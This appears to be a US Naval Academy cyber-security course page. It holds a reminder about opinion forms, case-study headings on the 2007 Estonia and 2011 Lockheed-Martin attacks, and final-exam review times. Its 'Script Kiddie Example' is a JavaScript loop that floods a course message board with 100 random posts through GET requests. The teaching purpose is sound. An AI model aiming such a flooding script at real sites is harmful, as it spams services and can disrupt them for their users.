Student Opinion Forms

Look at the calendar and think about how far you've come this semester.

Goto the login page for the SOF system, and login with your USNA credentials.

Take 15 minutes to complete the SOF.

http://rona.academy.usna.edu/~sy110/lec/caseStudy/lec.html


Case Studies

Estona - 2007

Script Kiddie Example
  1. Create an account on the message board and login.
    http://rona.academy.usna.edu/~bhawkins/msg/mb.html
  2. Copy the code on the right, paste it into the
    SY110 Batch Interpreter, and click "Run" to execute it.
  3. Now go look at the message board, and you should see a 100 new silly 30-word messages.
   
var i = 0;
while(i < 100)
{
  i = i + 1;

  // Make a silly random message
  var words=["the","rain","in","Spain","falls","mainly","on","the","plain"];
  var msg = "";
  var j = 0; while(j < 30) { msg = msg + words[Math.floor(Math.random()*9)%9]+" "; j = j + 1; }

  // Posts message to message board without navigating to the message board
  try
  {
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.open("GET", "http://rona.academy.usna.edu/~bhawkins/msg/mb.cgi?msg="+msg,true);
    xmlhttp.send(null)
  } catch (e)
  {
    xmlhttp=false;
  }
}

Lockheed-Martin - 2011


Final Exam - Thursday 14 Dec, 1330-1630

http://rona.academy.usna.edu/~sy110/lec/examFinal/lec.html

Review Sessions
Instructor Led

Instructor Time/Date Location Attendance Limit
Mr. De Bels 1930–2130 12 Dec 2017 CH100 200

MGSP Led

Date Location Time
Monday, 11 Dec MI116 0900-1000
Tuesday, 12 Dec MI200 1900-2100
Wednesday, 13 Dec MI200 1900-2200